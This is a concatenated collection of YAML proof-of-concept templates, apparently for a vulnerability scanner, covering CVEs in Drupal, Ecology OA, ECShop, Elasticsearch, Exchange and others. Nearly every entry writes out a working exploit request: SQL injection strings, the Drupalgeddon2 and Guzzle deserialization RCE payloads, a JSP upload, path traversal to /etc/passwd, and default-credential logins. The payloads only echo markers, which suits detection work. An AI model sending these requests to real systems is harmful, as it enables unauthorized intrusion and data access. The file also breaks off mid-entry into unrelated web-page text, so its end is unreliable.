expression: response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers")
expression: r0()
detail:
author: met7or
links:
- https://github.com/alibaba/druid
================================================
FILE: pocs/drupal-cve-2014-3704-sqli.yml
================================================
name: poc-yaml-drupal-cve-2014-3704-sqli
manual: true
transport: http
set:
rand: randomInt(200000000, 210000000)
rules:
r0:
request:
method: POST
path: /?q=node&destination=node
headers:
Content-Type: application/x-www-form-urlencoded
body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,(select md5({{rand}}))),0)%23]=bob&name[0]=a
expression: response.status == 500 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
expression: r0()
detail:
links:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704
Affected Version: Drupal < 7.32
================================================
FILE: pocs/drupal-cve-2018-7600-rce.yml
================================================
name: poc-yaml-drupal-cve-2018-7600-rce
manual: true
transport: http
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
drupal70:
request:
cache: true
method: POST
path: /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
expression: response.status == 200
output:
search: '"name=\"form_build_id\"\\s+value=\"(?P.+?)\"".bsubmatch(response.body)'
build_id: search["build_id"]
drupal71:
request:
cache: true
method: POST
path: /?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_build_id={{build_id}}
expression: response.body.bcontains(bytes(r1 + "%" + r2))
drupal80:
request:
cache: true
method: POST
path: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
headers:
Content-Type: application/x-www-form-urlencoded
body: |
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
expression: response.body.bcontains(bytes(r1 + "%" + r2))
expression: drupal80() || drupal70() && drupal71()
detail:
links:
- https://github.com/dreadlocked/Drupalgeddon2
- https://paper.seebug.org/567/
================================================
FILE: pocs/drupal-cve-2019-6340.yml
================================================
name: poc-yaml-drupal-cve-2019-6340
manual: true
transport: http
set:
host: request.url.host
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
r0:
request:
cache: true
method: POST
path: /node/?_format=hal_json
headers:
Accept: '*/*'
Content-Type: application/hal+json
body: |
{
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links": {
"type": {
"href": "http://{{host}}/rest/type/shortcut/default"
}
}
}
follow_redirects: true
expression: response.status == 403 && response.content_type.contains("hal+json") && response.body.bcontains(bytes(r1 + "%" + r2))
expression: r0()
detail:
author: thatqier
links:
- https://github.com/jas502n/CVE-2019-6340
- https://github.com/knqyf263/CVE-2019-6340
================================================
FILE: pocs/dubbo-admin-default-password.yml
================================================
name: poc-yaml-dubbo-admin-default-password
manual: true
transport: http
rules:
guest0:
request:
cache: true
method: GET
path: /
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
expression: 'response.status == 200 && response.body.bcontains(b"Dubbo Admin ") && response.body.bcontains(b": guest'', ''/logout''") && response.body.bcontains(b"/sysinfo/versions")'
root0:
request:
cache: true
method: GET
path: /
headers:
Authorization: Basic cm9vdDpyb290
expression: 'response.status == 200 && response.body.bcontains(b"Dubbo Admin ") && response.body.bcontains(b": root'', ''/logout''") && response.body.bcontains(b"/sysinfo/versions")'
expression: root0() || guest0()
detail:
author: mumu0215(https://github.com/mumu0215)
links:
- https://www.cnblogs.com/wishwzp/p/9438658.html
================================================
FILE: pocs/duomicms-sqli.yml
================================================
name: poc-yaml-duomicms-sqli
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))
follow_redirects: false
expression: response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935")
expression: r0()
detail:
author: hanxiansheng26(https://github.com/hanxiansheng26)
links:
- https://xz.aliyun.com/t/2828
Affected Version: duomicms<3.0
================================================
FILE: pocs/dvr-cve-2018-9995.yml
================================================
name: poc-yaml-dvr-cve-2018-9995
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /device.rsp?opt=user&cmd=list
headers:
Cookie: uid=admin
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes("\"uid\":")) && response.body.bcontains(b"playback")
expression: r0()
detail:
author: cc_ci(https://github.com/cc8ci)
links:
- https://s.tencent.com/research/bsafe/474.html
Affected Version: DVR
================================================
FILE: pocs/e-zkeco-cnvd-2020-57264-read-file.yml
================================================
name: poc-yaml-e-zkeco-cnvd-2020-57264-read-file
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /iclock/ccccc/windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: r0()
detail:
author: ThestaRY (https://github.com/ThestaRY7/)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-57264
info: E-ZKEco readfileCNVD-2020-57264
================================================
FILE: pocs/ecology-arbitrary-file-upload.yml
================================================
name: poc-yaml-ecology-arbitrary-file-upload
manual: true
transport: http
set:
r1: randomLowercase(4)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rules:
r0:
request:
cache: true
method: POST
path: /page/exportImport/uploadOperation.jsp
headers:
Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
body: "\
--b0d829daa06c13d6b3e16b0ad21d1eed\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"{{r1}}.jsp\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
--b0d829daa06c13d6b3e16b0ad21d1eed--\r\n\
"
expression: response.status == 200
r1:
request:
cache: true
method: GET
path: /page/exportImport/fileTransfer/{{r1}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
================================================
FILE: pocs/ecology-filedownload-directory-traversal.yml
================================================
name: poc-yaml-ecology-filedownload-directory-traversal
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"/weaver/")
expression: r0()
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp
================================================
FILE: pocs/ecology-javabeanshell-rce.yml
================================================
name: poc-yaml-ecology-javabeanshell-rce
manual: true
transport: http
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
r0:
request:
cache: true
method: POST
path: /weaver/bsh.servlet.BshServlet
body: bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp
================================================
FILE: pocs/ecology-springframework-directory-traversal.yml
================================================
name: poc-yaml-ecology-springframework-directory-traversal
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"/weaver/")
expression: r0()
detail:
author: l1nk3r
links:
- https://www.weaver.com.cn/cs/securityDownload.asp
================================================
FILE: pocs/ecology-syncuserinfo-sqli.yml
================================================
name: poc-yaml-ecology-syncuserinfo-sqli
manual: true
transport: http
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
r0:
request:
cache: true
method: GET
path: /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://www.weaver.com.cn/
================================================
FILE: pocs/ecology-v8-sqli.yml
================================================
name: poc-yaml-ecology-v8-sqli
manual: true
transport: http
set:
r1: randomInt(1000, 9999)
r2: randomInt(1000, 9999)
rules:
r0:
request:
cache: true
method: GET
path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{r1}}*{{r2}}+as+id
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()
detail:
author: Print1n(http://print1n.top)
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
================================================
FILE: pocs/ecology-validate-sqli.yml
================================================
name: poc-yaml-ecology-validate-sqli
manual: true
transport: http
set:
r1: randomInt(8000, 9999)
r2: randomInt(800, 1000)
rules:
r0:
request:
cache: true
method: POST
path: /cpt/manage/validate.jsp?sourcestring=validateNum
body: sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()
detail:
author: fuping
links:
- https://news.ssssafe.com/archives/3325
- https://www.weaver.com.cn/cs/securityDownload.asp
================================================
FILE: pocs/ecology-workflowcentertreedata-sqli.yml
================================================
name: poc-yaml-ecology-workflowcentertreedata-sqli
manual: true
transport: http
set:
r1: randomInt(4000, 9999)
r2: randomInt(800, 1000)
rules:
r0:
request:
cache: true
method: POST
path: /mobile/browser/WorkflowCenterTreeData.jsp
headers:
Content-Type: application/x-www-form-urlencoded
body: node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,({{r1}}*{{r2}})+order+by+(((1
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()
detail:
author: JingLing(https://hackfun.org/)
links:
- https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html
- https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w
================================================
FILE: pocs/ecshop-cnvd-2020-58823-sqli.yml
================================================
name: poc-yaml-ecshop-cnvd-2020-58823-sqli
manual: true
transport: http
set:
r1: randomInt(40000, 44800)
rules:
r0:
request:
cache: true
method: POST
path: /delete_cart_goods.php
body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
expression: response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw
================================================
FILE: pocs/ecshop-collection-list-sqli.yml
================================================
name: poc-yaml-ecshop-collection-list-sqli
manual: true
transport: http
set:
r1: randomInt(10000, 99999)
rules:
r0:
request:
cache: true
method: GET
path: /user.php?act=collection_list
headers:
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:55:"1' and updatexml(1,insert(md5({{r1}}),1,1,0x7e),1) and '";|45ea207d7a2b68c49582d2d22adf953a
follow_redirects: false
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 1, 31)))
expression: r0()
detail:
author: 曦shen
links:
- https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli
================================================
FILE: pocs/ecshop-rce.yml
================================================
name: poc-yaml-ecshop-rce
manual: true
transport: http
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
v2x0:
request:
cache: true
method: POST
path: /user.php
headers:
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
v3x0:
request:
cache: true
method: POST
path: /user.php
headers:
Content-Type: application/x-www-form-urlencoded
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
body: action=login&pp123=printf({{r1}}*{{r2}});
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: v2x0() || v3x0()
detail:
author: 凉风(http://webkiller.cn/)
links:
- https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md
================================================
FILE: pocs/eea-info-leak-cnvd-2021-10543.yml
================================================
name: poc-yaml-eea-info-leak-cnvd-2021-10543
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /authenticationserverservlet
expression: response.status == 200 && "(.*?) ".bmatches(response.body) && "(.*?) ".bmatches(response.body)
expression: r0()
detail:
author: Search?=Null
links:
- https://exp1orer.github.io
description: MessageSolution Enterprise Email Archiving (EEA) Info Leak.
================================================
FILE: pocs/elasticsearch-cve-2014-3120.yml
================================================
name: poc-yaml-elasticsearch-cve-2014-3120
manual: true
transport: http
set:
r: randomInt(800000000, 1000000000)
r1: randomInt(800000000, 1000000000)
rules:
r0:
request:
cache: true
method: POST
path: /test/test1/123
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: response.status == 201 || response.status == 200
r1:
request:
cache: true
method: POST
path: /_search
headers:
Content-Type: application/json
body: |-
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "{{r}}+{{r1}}"
}
}
}
follow_redirects: true
expression: response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
expression: r0() && r1()
detail:
author: suancaiyu、violin
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
elasticsearch: v1.1.1
================================================
FILE: pocs/elasticsearch-cve-2015-1427.yml
================================================
name: poc-yaml-elasticsearch-cve-2015-1427
manual: true
transport: http
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
r0:
request:
cache: true
method: POST
path: /test/test
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: response.status == 201
r1:
request:
cache: true
method: POST
path: /_search
headers:
Content-Type: application/json
body: |
{
"size":1,
"script_fields":{
"lupin":{
"lang":"groovy",
"script":"{{r1}}*{{r2}}"
}
}
}
expression: response.status == 200 && response.content_type.icontains("json") && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0() && r1()
detail:
author: pululin(https://github.com/pululin)
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427
================================================
FILE: pocs/elasticsearch-cve-2015-3337-lfi.yml
================================================
name: poc-yaml-elasticsearch-cve-2015-3337-lfi
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
expression: r0()
detail:
author: X.Yang
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337
================================================
FILE: pocs/elasticsearch-cve-2015-5531.yml
================================================
name: poc-yaml-elasticsearch-cve-2015-5531
manual: true
transport: http
set:
r1: randomLowercase(4)
rules:
r0:
request:
cache: true
method: PUT
path: /_snapshot/{{r1}}
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}"
}
}
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
r1:
request:
cache: true
method: PUT
path: /_snapshot/{{r1}}2
headers:
Content-Type: application/x-www-form-urlencoded
body: |-
{
"type": "fs",
"settings":{
"location": "/usr/share/elasticsearch/repo/{{r1}}/snapshot-backdata"
}
}
follow_redirects: true
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
r2:
request:
cache: true
method: GET
path: /_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
follow_redirects: true
expression: response.status == 400 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"error\":\"ElasticsearchParseException[Failed to derive xcontent from")
expression: r0() && r1() && r2()
detail:
author: ha9worm(https://github.com/ha9worm)
links:
- https://www.cnblogs.com/sallyzhang/p/12457031.html
================================================
FILE: pocs/elasticsearch-unauth.yml
================================================
name: poc-yaml-elasticsearch-unauth
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search")
r1:
request:
cache: true
method: GET
path: /_cat
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"/_cat/master")
expression: r0() && r1()
detail:
author: p0wd3r
links:
- https://yq.aliyun.com/articles/616757
================================================
FILE: pocs/etcd-unauth.yml
================================================
name: poc-yaml-etcd-unauth
manual: true
transport: http
set:
r1: randomLowercase(32)
r2: randomLowercase(32)
r3: randomLowercase(32)
rules:
r0:
request:
cache: true
method: PUT
path: /v2/keys/{{r1}}?dir=true
follow_redirects: false
expression: response.status == 201
r1:
request:
cache: true
method: PUT
path: /v2/keys/{{r1}}/{{r2}}?prevExist=false
headers:
Content-Type: application/x-www-form-urlencoded
body: value={{r3}}
follow_redirects: false
expression: response.status == 201
r2:
request:
cache: true
method: GET
path: /v2/keys/{{r1}}/{{r2}}?quorum=false&recursive=false&sorted=false
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(r3))
expression: r0() && r1() && r2()
detail:
author: j4ckzh0u(https://github.com/j4ckzh0u)
links:
- https://www.freebuf.com/news/196993.html
================================================
FILE: pocs/etouch-v2-sqli.yml
================================================
name: poc-yaml-etouch-v2-sqli
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
expression: response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
expression: r0()
detail:
author: MaxSecurity(https://github.com/MaxSecurity)
links:
- https://github.com/mstxq17/CodeCheck/
- https://www.anquanke.com/post/id/168991
================================================
FILE: pocs/exchange-cve-2021-26855-ssrf.yml
================================================
name: poc-yaml-exchange-cve-2021-26855-ssrf
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /owa/auth/x.js
headers:
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
follow_redirects: false
expression: response.headers["X-CalculatedBETarget"].icontains("localhost")
expression: r0()
detail:
author: sharecast
links:
- https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse
Affected Version: Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010
================================================
FILE: pocs/exchange-cve-2021-41349-xss.yml
================================================
name: poc-yaml-exchange-cve-2021-41349-xss
manual: true
transport: http
rules:
r0:
request:
method: POST
path: "/autodiscover/autodiscover.json"
headers:
Content-Type: application/x-www-form-urlencoded
body:
expression: |
response.status == 500 && response.body.bcontains(b"
We're sorry but this page doesn't work properly without JavaScript enabled.
Please enable it to continue.
提供平台注册id进行验证,验证通过后即可进群!
